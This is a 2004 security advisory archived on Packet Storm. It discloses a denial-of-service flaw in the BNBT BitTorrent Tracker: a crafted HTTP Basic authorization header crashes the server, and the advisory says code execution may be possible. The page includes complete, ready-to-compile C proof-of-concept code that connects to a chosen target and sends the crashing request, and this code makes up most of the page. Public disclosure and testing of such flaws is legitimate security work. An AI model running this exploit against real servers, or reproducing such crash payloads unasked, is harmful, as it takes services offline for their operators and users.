exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SP Research Labs Advisory 12

SP Research Labs Advisory 12
Posted May 24, 2004
Authored by Badpack3t, SP Research Labs | Site security-protocols.com

BNBT BitTorrent Tracker Beta 7.5 Release 2 and earlier versions are susceptible a denial of service due to a malicious crafted HTTP GET request. Sample exploit included. Tested on Windows XP SP1.

tags | exploit, web, denial of service
systems | windows
SHA-256 | 9890d7016baddf8fdcf712e31a16c8da51096b32a041e1fa58e9d203e5c84240

SP Research Labs Advisory 12

Change Mirror Download
SP Research Labs Advisory x12
-----------------------------

BNBT BitTorrent Tracker Denial Of Service
-----------------------------------------

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

Date Released - 5.21.2004

------------------------------------
Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser
General Public License (LGPL).

--------
Details:

A specifically crafted HTTP GET request which contains 'Authorization: Basic A==' will cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous versions are also affected by
this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the BNBT server to crash.

--------------
Tested on:
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
PoC to crash the server
/****************************/

/* BNBT BitTorrent Tracker Denial Of Service

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

Coded and Discovered by:
badpack3t <badpack3t@security-protocols.com>
.:sp research labs:.
www.security-protocols.com
5.21.2004

This PoC will only DoS the server to verify if it is vulnerable.
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;

if (argc < 2)
{
printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n <badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 6969;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}

printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}

printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}

printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close